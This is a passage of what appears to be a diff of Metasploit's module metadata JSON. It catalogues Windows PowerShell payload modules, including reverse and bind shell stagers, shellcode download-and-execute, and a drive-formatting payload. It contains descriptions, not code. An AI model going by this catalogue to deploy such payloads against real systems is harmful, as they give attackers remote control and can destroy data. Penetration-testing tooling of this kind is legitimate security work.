"cmd/windows/powershell/dllinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4", - "aliases": [], - 
"rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/dllinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/dllinject/reverse_winhttp": { - "name": "Powershell Exec, Windows Reverse HTTP Stager 
(winhttp)", - "fullname": "payload/cmd/windows/powershell/dllinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dllinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_cmd/windows/powershell/dns_txt_query_exec": { - "name": "Powershell Exec, DNS TXT Record Payload Download and Execution", - "fullname": "payload/cmd/windows/powershell/dns_txt_query_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "corelanc0d3r " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nPerforms a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\noption is used as the base name to iterate over. The payload will first request the TXT contents of the a\nhostname, followed by b, then c, etc. until there are no more records. 
For each record that is returned, exactly\n255 bytes from it are copied into a buffer that is eventually executed. This buffer should be encoded using\nx86/alpha_mixed with the BufferRegister option set to EDI.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/dns_txt_query_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/dns_txt_query_exec", - "staged": false - }, - "payload_cmd/windows/powershell/download_exec": { - "name": "Powershell Exec, Windows Executable Download (http,https,ftp) and Execute", - "fullname": "payload/cmd/windows/powershell/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "corelanc0d3r " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nDownload an EXE from an HTTP(S)/FTP URL and execute it", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/download_exec", - "staged": false - }, - "payload_cmd/windows/powershell/exec": { - "name": 
"Powershell Exec", - "fullname": "payload/cmd/windows/powershell/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/exec", - "staged": false - }, - "payload_cmd/windows/powershell/format_all_drives": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/format_all_drives", - "aliases": [], - "rank": 0, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ashfaq Ansari ", - "Ruei-Min Jiang " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [ - "URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html", - "URL-https://github.com/hacksysteam/ShellcodeOfDeath" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/format_all_drives", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ShellcodeOfDeath" - ] - }, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", 
- "adapted_refname": "windows/format_all_drives", - "staged": false - }, - "payload_cmd/windows/powershell/generic/debug_trap": { - "name": "Powershell Exec, Generic x86 Debug Trap", - "fullname": "payload/cmd/windows/powershell/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "robert " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "generic/debug_trap", - "staged": false - }, - "payload_cmd/windows/powershell/generic/tight_loop": { - "name": "Powershell Exec, Generic x86 Tight Loop", - "fullname": "payload/cmd/windows/powershell/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jduck " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/generic/tight_loop", - "check": false, - "post_auth": 
false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "generic/tight_loop", - "staged": false - }, - "payload_cmd/windows/powershell/loadlibrary": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/loadlibrary", - "staged": false - }, - "payload_cmd/windows/powershell/messagebox": { - "name": "Powershell Exec, Windows MessageBox", - "fullname": "payload/cmd/windows/powershell/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "corelanc0d3r ", - "jduck " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawns a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/powershell/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/messagebox", - "staged": false - }, - "payload_cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 
+0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 
TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/meterpreter/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - 
"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/meterpreter/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": 
"windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - 
"platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/meterpreter/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/bind_tcp_uuid", - "staged": true, - 
"stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/meterpreter/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/find_tag", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_http": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_http" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore": { - "name": "Powershell Exec, Reverse HTTP Stager Proxy", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": 
